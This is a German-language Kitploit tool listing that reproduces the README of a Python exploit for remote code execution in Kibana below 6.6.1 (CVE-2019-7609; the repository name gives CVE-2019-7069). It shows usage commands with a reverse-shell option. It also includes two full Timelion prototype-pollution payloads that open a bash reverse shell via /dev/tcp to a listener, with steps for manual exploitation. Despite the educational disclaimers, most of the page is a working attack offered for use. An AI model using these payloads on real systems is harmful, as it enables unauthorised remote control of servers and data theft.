Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-7069-POC — Python-3-Exploit für Kibana < 6.6.1 RCE (CVE-2019-7609) über Prototype Pollution, mit automatischer Versionserkennung und optionaler Reverse Shell. | Kitploit
Tools/GitHubGitHub/caelumisme/cve-2019-7069-poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungPayload-Entwicklung
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Python-3-Exploit für Kibana < 6.6.1 RCE (CVE-2019-7609) über Prototype Pollution, mit automatischer Versionserkennung und optionaler Reverse Shell.

Repository anzeigen
1vor 10 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Kibana < 6.6.1 Remotecode-Ausführungs-Exploit (CVE-2019-7609)

Exploit Banner

🚨 RCE-Exploit für Bildungszwecke 🚨

Autor: LandGrey (Python3-Refactoring von [Your Name])
Referenz: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ Haftungsausschluss:
Dieses Skript ist ausschließlich für Bildungszwecke und autorisierte Penetrationstests bestimmt. Verwenden Sie es nicht auf Systemen, die Ihnen nicht gehören oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben. Der Autor und die Mitwirkenden übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Werkzeug verursacht werden.


🎯 Was ist das?

Dies ist ein Python-3-Exploit-Skript für die Remotecode-Ausführungssicherheitslücke in Kibana-Versionen < 6.6.1. Es nutzt eine Prototyp-Verschmutzungsschwachstelle aus, um beliebige Befehle auszuführen, einschließlich des Startens einer Reverse Shell, auf einer verwundbaren Kibana-Instanz.

🕹️ Funktionen

  • Erkennt automatisch die Kibana-Version
  • Überprüft den Verwundbarkeitsstatus
  • Optional: Startet eine Reverse Shell zu Ihrem Listener
  • Saubere, interaktive Terminalausgabe
  • Vollständig Python 3 kompatibel

📚 Referenzen

  • Exploit-DB Eintrag 46651
  • Kibana Offizielle Website
  • CVE-2019-7609

🚀 Verwendung

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601

Um eine Reverse Shell auszulösen:

root@kitploit:~
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT

Beispiel

root@kitploit:~
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444

🛠️ Voraussetzungen

  • Python 3.x
  • Bibliothek requests
  • Bibliothek packaging

Installieren Sie die Abhängigkeiten mit:

root@kitploit:~
pip install requests packaging

💡 Manuelle Ausnutzung über Timelion

Sie können diese Sicherheitslücke auch manuell mit dem Timelion-Visualizer von Kibana ausnutzen:

  1. Öffnen Sie Kibana
  2. Fügen Sie einen der folgenden Payloads in den Timelion-Visualizer ein
  3. Klicken Sie auf Run
  4. Klicken Sie im linken Bereich auf Canvas
  5. Ihre Reverse Shell sollte erscheinen! :)

Payload von securityMB:

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Payload von chybeta:

root@kitploit:~
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')

Ersetzen Sie 192.168.1.100 und 4444 durch Ihre eigene Listener-IP und Ihren Port.


🧩 So funktioniert es

  • Erkennt die Kibana-Version per HTTP-Anfrage
  • Überprüft, ob das Ziel für CVE-2019-7609 anfällig ist
  • Nutzt Prototyp-Verschmutzung aus, um beliebige Befehle auszuführen
  • Startet optional eine Reverse Shell zu Ihrer angegebenen Host-IP und Port

🎨 Ausgabe

Das Skript liefert eine klare, schrittweise Ausgabe für Erkennung, Überprüfung und Ausnutzung, sodass es einfach zu befolgen und unterhaltsam zu verwenden ist!


👾 Für Spaß und Lernen

Dieses Skript ist eine großartige Möglichkeit, etwas über Prototyp-Verschmutzung, Remotecode-Ausführung und Penetrationstesttechniken zu lernen. Verwenden Sie es verantwortungsvoll und immer mit Erlaubnis!


📝 Lizenz

Dieses Projekt ist nur für Bildungszwecke gedacht. Keine Gewährleistung, keine Garantien. Hacken Sie ethisch, bleiben Sie neugierig und haben Sie Spaß!

Tool herunterladen